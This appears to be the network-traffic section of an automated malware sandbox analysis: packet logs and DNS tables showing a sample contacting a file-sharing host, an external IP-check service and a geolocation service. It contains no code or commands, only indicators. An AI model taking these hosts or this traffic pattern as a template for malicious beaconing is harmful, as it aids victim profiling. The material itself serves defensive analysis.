                                                                    Feb 14, 2025 09:20:41.310127974 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.310400009 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.310456038 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.310467005 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.351576090 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.393502951 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.393600941 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.393738031 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.393738985 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.393802881 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.393860102 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.395935059 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396013021 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.396025896 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396275043 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396338940 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.396368027 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396640062 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396703959 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.396725893 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.396960020 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397021055 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.397031069 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397191048 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397249937 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.397262096 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397558928 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397619009 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.397629023 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397706032 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397772074 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.397782087 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397891998 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.397959948 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.397970915 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398020029 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398077011 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.398098946 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398590088 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398659945 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.398669958 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398694038 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398756027 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.398766041 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398825884 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.398885965 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.398896933 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.399350882 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.399413109 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.399425030 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.399552107 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.399610043 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.399620056 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.445296049 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.482218981 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.482307911 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.482357979 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.482389927 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.482455969 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.482470036 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.484797955 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.484882116 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.484894037 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485008001 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485070944 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.485081911 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485299110 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485356092 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.485371113 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485402107 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.485614061 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485675097 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.485687017 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485918999 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.485987902 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.485997915 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486120939 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486181021 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.486191034 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486393929 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486459017 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.486469984 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486778975 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486844063 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.486855030 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486895084 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.486951113 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.486960888 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487356901 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487427950 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.487438917 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487514019 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487577915 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.487590075 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487701893 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487760067 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.487770081 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.487962008 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.488027096 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.488037109 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.488100052 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.488169909 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.488179922 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.539036989 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.571053982 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.571156025 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.571165085 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.571175098 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.571230888 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.571243048 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.573725939 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.573801994 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.573815107 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.573915958 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.573971033 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.573982000 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574194908 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574259043 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.574271917 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574410915 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574476004 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.574486017 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574738979 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.574810982 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.574821949 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575016975 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575082064 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.575093031 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575283051 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575351000 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.575361967 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575437069 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575499058 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.575510025 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575872898 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.575948000 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.575958014 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576015949 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576076984 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.576086998 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576148987 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576200962 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.576211929 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576569080 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576631069 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.576642036 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576706886 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576769114 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.576778889 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576845884 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.576908112 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.576917887 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.617065907 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.659905910 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.660118103 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.660181046 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.660213947 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.660301924 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.660317898 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.662570000 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.662646055 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.662657022 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.662839890 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.662910938 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.662921906 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663050890 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663116932 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.663130045 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663258076 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663321972 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.663332939 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663522959 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663587093 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.663597107 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663834095 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.663921118 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.663930893 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664267063 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664335966 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.664347887 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664410114 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664474964 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.664484978 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664541960 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664611101 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.664622068 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664835930 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.664905071 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.664915085 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665201902 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665268898 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.665280104 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665328979 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665389061 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.665399075 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665558100 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665657043 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.665667057 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665750027 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.665810108 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.665819883 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.710969925 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.749059916 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.749217033 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.749299049 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.749299049 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.749362946 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.749434948 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.751502991 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.751594067 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.751606941 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.751682043 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.751750946 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.751763105 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.751931906 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752000093 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.752011061 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752149105 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752218008 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.752228975 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752491951 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752558947 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.752571106 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752751112 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752819061 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.752830982 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.752968073 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753034115 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.753043890 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753290892 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753360987 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.753371000 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753426075 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753494024 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.753504992 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753551006 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753611088 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.753621101 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.753974915 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754048109 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.754056931 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754323006 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754394054 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.754404068 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754456043 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754520893 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.754542112 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754796982 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.754863024 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.754873991 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.804675102 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.837852001 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.838012934 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.838128090 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.838191986 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.838238001 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.838262081 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.840240955 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.840323925 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.840337992 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.840363026 CET44349705193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.840421915 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.845786095 CET49705443192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.846524954 CET4970480192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:20:41.851545095 CET8049704193.30.119.107192.168.2.5
                                                                    Feb 14, 2025 09:20:41.851660967 CET4970480192.168.2.5193.30.119.107
                                                                    Feb 14, 2025 09:21:31.751142979 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:21:31.756020069 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:21:31.756194115 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:21:31.756268978 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:21:31.761020899 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:21:32.404753923 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:21:32.408797026 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:21:32.413852930 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:21:32.599126101 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:21:32.608634949 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:32.608696938 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:32.608895063 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:32.612801075 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:32.612834930 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:32.648228884 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:21:33.096581936 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.096683025 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:33.102041006 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:33.102056026 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.102319956 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.146009922 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:33.191343069 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.261579037 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.261683941 CET44349951104.21.112.1192.168.2.5
                                                                    Feb 14, 2025 09:21:33.261754990 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:21:33.266881943 CET49951443192.168.2.5104.21.112.1
                                                                    Feb 14, 2025 09:22:37.814914942 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:22:37.815104008 CET8049942193.122.6.168192.168.2.5
                                                                    Feb 14, 2025 09:22:37.815104961 CET4994280192.168.2.5193.122.6.168
                                                                    Feb 14, 2025 09:22:37.815201998 CET4994280192.168.2.5193.122.6.168
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 14, 2025 09:20:39.123471975 CET5461453192.168.2.51.1.1.1
                                                                    Feb 14, 2025 09:20:39.133348942 CET53546141.1.1.1192.168.2.5
                                                                    Feb 14, 2025 09:21:31.739450932 CET5194253192.168.2.51.1.1.1
                                                                    Feb 14, 2025 09:21:31.746757984 CET53519421.1.1.1192.168.2.5
                                                                    Feb 14, 2025 09:21:32.600683928 CET6470153192.168.2.51.1.1.1
                                                                    Feb 14, 2025 09:21:32.607889891 CET53647011.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Feb 14, 2025 09:20:39.123471975 CET192.168.2.51.1.1.10xe07bStandard query (0)3007.filemail.comA (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.739450932 CET192.168.2.51.1.1.10x3de0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.600683928 CET192.168.2.51.1.1.10xd9bbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Feb 14, 2025 09:20:39.133348942 CET1.1.1.1192.168.2.50xe07bNo error (0)3007.filemail.comip.3007.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                    Feb 14, 2025 09:20:39.133348942 CET1.1.1.1192.168.2.50xe07bNo error (0)ip.3007.filemail.com193.30.119.107A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:31.746757984 CET1.1.1.1192.168.2.50x3de0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
